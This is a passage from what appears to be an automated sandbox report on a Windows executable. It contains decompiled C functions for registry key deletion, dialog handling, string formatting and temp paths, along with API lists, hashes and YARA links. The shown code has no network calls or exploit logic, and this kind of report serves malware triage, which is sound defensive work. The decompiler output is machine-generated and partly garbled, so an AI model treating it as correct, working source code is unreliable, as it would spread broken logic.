						goto L56;
					}
					_t58 = _t48 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags = _t91 - _t78;
						if(_t91 != _t78) {
							goto L54;
						}
						__eflags = _t88 - _v8;
						if(_t88 != _v8) {
							goto L54;
						}
						goto L47;
					}
					_t59 = _t58 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
						if( *((char*)(_t82 + 1)) != 0x3e) {
							__eflags = _t88 - _v8;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t91 - _t78;
							if(_t91 <= _t78) {
								goto L54;
							}
							goto L47;
						}
						_t86 = _t88;
						_t49 = E10002BF0(_t91, _t78, _t86);
						goto L56;
					}
					_t61 = _t59 - 0x20;
					__eflags = _t61;
					if(_t61 == 0) {
						_t91 = _t91 ^ _t78;
						_t88 = _t88 ^ _v8;
						goto L57;
					}
					_t62 = _t61 - 0x1e;
					__eflags = _t62;
					if(_t62 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
						if( *((char*)(_t82 + 1)) != 0x7c) {
							_t91 = _t91 | _t78;
							_t88 = _t88 | _v8;
							goto L57;
						}
						__eflags = _t91 | _t88;
						if((_t91 | _t88) != 0) {
							goto L47;
						}
						__eflags = _t78 | _v8;
						if((_t78 | _v8) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t62 == 0;
					if(_t62 == 0) {
						_t91 =  !_t91;
						_t88 =  !_t88;
					}
					goto L57;
				}
				if(_t102 == 0) {
					L21:
					__eflags = _t78 | _v8;
					if((_t78 | _v8) != 0) {
						_v20 = E10002A60(_t91, _t88, _t78, _v8);
						_v16 = _t86;
						_t49 = E10002B10(_t91, _t88, _t78, _v8);
						_t82 = _a8;
					} else {
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_t49 = _t91;
						_t86 = _t88;
					}
					__eflags =  *_t82 - 0x2f;
					if( *_t82 != 0x2f) {
						goto L56;
					} else {
						_t91 = _v20;
						_t88 = _v16;
						goto L57;
					}
				}
				_t68 = _t47 - 0x21;
				if(_t68 == 0) {
					_t49 = 0;
					__eflags = _t91 | _t88;
					if((_t91 | _t88) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t69 = _t68 - 4;
				if(_t69 == 0) {
					goto L21;
				}
				_t70 = _t69 - 1;
				if(_t70 == 0) {
					__eflags =  *((char*)(_t82 + 1)) - 0x26;
					if( *((char*)(_t82 + 1)) != 0x26) {
						_t91 = _t91 & _t78;
						_t88 = _t88 & _v8;
						goto L57;
					}
					__eflags = _t91 | _t88;
					if((_t91 | _t88) == 0) {
						goto L54;
					}
					__eflags = _t78 | _v8;
					if((_t78 | _v8) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t71 = _t70 - 4;
				if(_t71 == 0) {
					_t49 = E10002A20(_t91, _t88, _t78, _v8);
					goto L56;
				} else {
					_t72 = _t71 - 1;
					if(_t72 == 0) {
						_t91 = _t91 + _t78;
						asm("adc edi, [ebp-0x4]");
					} else {
						if(_t72 == 0) {
							_t91 = _t91 - _t78;
							asm("sbb edi, [ebp-0x4]");
						}
					}
					goto L57;
				}
			}


























                                                                                                                          0x10001adf
                                                                                                                          0x10001aec
                                                                                                                          0x10001af5
                                                                                                                          0x10001af8
                                                                                                                          0x10001afd
                                                                                                                          0x10001b05
                                                                                                                          0x10001b10
                                                                                                                          0x10001b19
                                                                                                                          0x10001b1b
                                                                                                                          0x10001b1e
                                                                                                                          0x10001b20
                                                                                                                          0x10001b24
                                                                                                                          0x10001b30
                                                                                                                          0x10001b39
                                                                                                                          0x10001b3e
                                                                                                                          0x10001b41
                                                                                                                          0x10001b47
                                                                                                                          0x10001b47
                                                                                                                          0x10001b4a
                                                                                                                          0x10001b4d
                                                                                                                          0x10001b50
                                                                                                                          0x10001c16
                                                                                                                          0x10001c16
                                                                                                                          0x10001c19
                                                                                                                          0x10001c82
                                                                                                                          0x10001c86
                                                                                                                          0x10001c95
                                                                                                                          0x10001c98
                                                                                                                          0x10001ca0
                                                                                                                          0x10001ca0
                                                                                                                          0x10001ca0
                                                                                                                          0x10001ca2
                                                                                                                          0x10001ca2
                                                                                                                          0x10001ca3
                                                                                                                          0x10001ca3
                                                                                                                          0x10001ca5
                                                                                                                          0x10001ca7
                                                                                                                          0x10001cb0
                                                                                                                          0x10001cbc
                                                                                                                          0x10001ccd
                                                                                                                          0x10001cd8
                                                                                                                          0x10001cd8
                                                                                                                          0x10001c9a
                                                                                                                          0x10001c7d
                                                                                                                          0x10001c7d
                                                                                                                          0x10001c7f
                                                                                                                          0x10001c7f
                                                                                                                          0x00000000
                                                                                                                          0x10001c7f
                                                                                                                          0x10001c9c
                                                                                                                          0x10001c9e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c9e
                                                                                                                          0x10001c8a
                                                                                                                          0x10001c8e
                                                                                                                          0x00000000
                                                                                                                          0x10001c8e
                                                                                                                          0x10001c1b
                                                                                                                          0x10001c1b
                                                                                                                          0x10001c1c
                                                                                                                          0x10001c74
                                                                                                                          0x10001c76
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c78
                                                                                                                          0x10001c7b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c7b
                                                                                                                          0x10001c1e
                                                                                                                          0x10001c1e
                                                                                                                          0x10001c1f
                                                                                                                          0x10001c54
                                                                                                                          0x10001c58
                                                                                                                          0x10001c67
                                                                                                                          0x10001c6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c6c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c6e
                                                                                                                          0x10001c70
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c72
                                                                                                                          0x10001c5c
                                                                                                                          0x10001c60
                                                                                                                          0x00000000
                                                                                                                          0x10001c60
                                                                                                                          0x10001c21
                                                                                                                          0x10001c21
                                                                                                                          0x10001c24
                                                                                                                          0x10001c4d
                                                                                                                          0x10001c4f
                                                                                                                          0x00000000
                                                                                                                          0x10001c4f
                                                                                                                          0x10001c26
                                                                                                                          0x10001c26
                                                                                                                          0x10001c29
                                                                                                                          0x10001c35
                                                                                                                          0x10001c39
                                                                                                                          0x10001c46
                                                                                                                          0x10001c48
                                                                                                                          0x00000000
                                                                                                                          0x10001c48
                                                                                                                          0x10001c3b
                                                                                                                          0x10001c3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c3f
                                                                                                                          0x10001c42
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001c44
                                                                                                                          0x10001c2c
                                                                                                                          0x10001c2d
                                                                                                                          0x10001c2f
                                                                                                                          0x10001c31
                                                                                                                          0x10001c31
                                                                                                                          0x00000000
                                                                                                                          0x10001c2d
                                                                                                                          0x10001b56
                                                                                                                          0x10001bce
                                                                                                                          0x10001bd0
                                                                                                                          0x10001bd3
                                                                                                                          0x10001bf1
                                                                                                                          0x10001bf4
                                                                                                                          0x10001bfa
                                                                                                                          0x10001bff
                                                                                                                          0x10001bd5
                                                                                                                          0x10001bd5
                                                                                                                          0x10001bd9
                                                                                                                          0x10001bdd
                                                                                                                          0x10001bdf
                                                                                                                          0x10001bdf
                                                                                                                          0x10001c02
                                                                                                                          0x10001c05
                                                                                                                          0x00000000
                                                                                                                          0x10001c0b
                                                                                                                          0x10001c0b
                                                                                                                          0x10001c0e
                                                                                                                          0x00000000
                                                                                                                          0x10001c0e
                                                                                                                          0x10001c05
                                                                                                                          0x10001b58
                                                                                                                          0x10001b5b
                                                                                                                          0x10001bbf
                                                                                                                          0x10001bc1
                                                                                                                          0x10001bc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001bc9
                                                                                                                          0x10001b5d
                                                                                                                          0x10001b60
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001b62
                                                                                                                          0x10001b63
                                                                                                                          0x10001b99
                                                                                                                          0x10001b9d
                                                                                                                          0x10001bb5
                                                                                                                          0x10001bb7
                                                                                                                          0x00000000
                                                                                                                          0x10001bb7
                                                                                                                          0x10001b9f
                                                                                                                          0x10001ba1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001ba7
                                                                                                                          0x10001baa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001bb0
                                                                                                                          0x10001b65
                                                                                                                          0x10001b68
                                                                                                                          0x10001b8f
                                                                                                                          0x00000000
                                                                                                                          0x10001b6a
                                                                                                                          0x10001b6a
                                                                                                                          0x10001b6b
                                                                                                                          0x10001b7f
                                                                                                                          0x10001b81
                                                                                                                          0x10001b6d
                                                                                                                          0x10001b6f
                                                                                                                          0x10001b75
                                                                                                                          0x10001b77
                                                                                                                          0x10001b77
                                                                                                                          0x10001b6f
                                                                                                                          0x00000000
                                                                                                                          0x10001b6b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001B41
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001CCD
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001CD2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal$lstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 176019282-0
                                                                                                                          • Opcode ID: d5572105e1867ed90a5fd8c1a1141a17fe3d88b1f34ee5dafca5b024a32ddd6e
                                                                                                                          • Instruction ID: 87570af6809aa2a581422fcc871d61123a4e706d96dd3257f7c5f7ed4a9f45a4
                                                                                                                          • Opcode Fuzzy Hash: d5572105e1867ed90a5fd8c1a1141a17fe3d88b1f34ee5dafca5b024a32ddd6e
                                                                                                                          • Instruction Fuzzy Hash: 1F51F372D8415DEBFB22CFA48880EEDB7E5EF852D4FA24159E801A311DD771EE009B52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423ff0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A69(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						if( *0x423ff0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}








                                                                                                                          0x00402a8a
                                                                                                                          0x00402a92
                                                                                                                          0x00402aba
                                                                                                                          0x00402aa4
                                                                                                                          0x00402af4
                                                                                                                          0x00402afa
                                                                                                                          0x00000000
                                                                                                                          0x00402afc
                                                                                                                          0x00402ab8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402ab8
                                                                                                                          0x00402acf
                                                                                                                          0x00402ad7
                                                                                                                          0x00402ade
                                                                                                                          0x00402b0a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402b12
                                                                                                                          0x00402b1a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402b1a
                                                                                                                          0x00000000
                                                                                                                          0x00402aed
                                                                                                                          0x00402b01

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                          • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                                                                                          • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                          • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                          0x00401ce8
                                                                                                                          0x00401cef
                                                                                                                          0x00401d1e
                                                                                                                          0x00401d26
                                                                                                                          0x00401d2d
                                                                                                                          0x00401d2d
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00401CE2
                                                                                                                          • GetClientRect.USER32 ref: 00401CEF
                                                                                                                          • LoadImageA.USER32 ref: 00401D10
                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: c677baef4c26648a016b17c6cbe1d7ca5eca33ff03ec9b6ea06848821df726be
                                                                                                                          • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                                                                                          • Opcode Fuzzy Hash: c677baef4c26648a016b17c6cbe1d7ca5eca33ff03ec9b6ea06848821df726be
                                                                                                                          • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                                                                                                          0x0040464f
                                                                                                                          0x00404654
                                                                                                                          0x0040465c
                                                                                                                          0x0040465d
                                                                                                                          0x0040466a
                                                                                                                          0x00404672
                                                                                                                          0x00404673
                                                                                                                          0x00404675
                                                                                                                          0x00404677
                                                                                                                          0x00404679
                                                                                                                          0x0040467c
                                                                                                                          0x0040467c
                                                                                                                          0x00404683
                                                                                                                          0x00404689
                                                                                                                          0x00404689
                                                                                                                          0x00404690
                                                                                                                          0x00404697
                                                                                                                          0x0040469a
                                                                                                                          0x0040469d
                                                                                                                          0x0040469d
                                                                                                                          0x004046a1
                                                                                                                          0x004046b1
                                                                                                                          0x004046b3
                                                                                                                          0x004046b6
                                                                                                                          0x0040465f
                                                                                                                          0x0040465f
                                                                                                                          0x00404666
                                                                                                                          0x00404666
                                                                                                                          0x004046be
                                                                                                                          0x004046c9
                                                                                                                          0x004046df
                                                                                                                          0x004046ef
                                                                                                                          0x0040470b

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                          • wsprintfA.USER32 ref: 004046EF
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404702
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                          • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                          • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                                                                                          • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                          • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                          0x00401bd3
                                                                                                                          0x00401bdf
                                                                                                                          0x00401be2
                                                                                                                          0x00401beb
                                                                                                                          0x00401beb
                                                                                                                          0x00401bee
                                                                                                                          0x00401bf2
                                                                                                                          0x00401bfb
                                                                                                                          0x00401bfb
                                                                                                                          0x00401bfe
                                                                                                                          0x00401c02
                                                                                                                          0x00401c04
                                                                                                                          0x00401c51
                                                                                                                          0x00401c53
                                                                                                                          0x00401c5c
                                                                                                                          0x00401c64
                                                                                                                          0x00401c67
                                                                                                                          0x00401c67
                                                                                                                          0x00401c70
                                                                                                                          0x00000000
                                                                                                                          0x00401c06
                                                                                                                          0x00401c0d
                                                                                                                          0x00401c0f
                                                                                                                          0x00401c17
                                                                                                                          0x00401c1a
                                                                                                                          0x00401c42
                                                                                                                          0x00401c76
                                                                                                                          0x00401c76
                                                                                                                          0x00401c1c
                                                                                                                          0x00401c2a
                                                                                                                          0x00401c32
                                                                                                                          0x00401c35
                                                                                                                          0x00401c35
                                                                                                                          0x00401c1a
                                                                                                                          0x00401c79
                                                                                                                          0x00401c7c
                                                                                                                          0x00401c82
                                                                                                                          0x00402866
                                                                                                                          0x00402866
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                          • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                                                                                          • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                          • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                          0x0040568c
                                                                                                                          0x004056a3
                                                                                                                          0x004056ab
                                                                                                                          0x004056ab
                                                                                                                          0x004056b3

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                                                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3936084776
                                                                                                                          • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                          • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                                                                                          • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                          • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                                                                                          Uniqueness

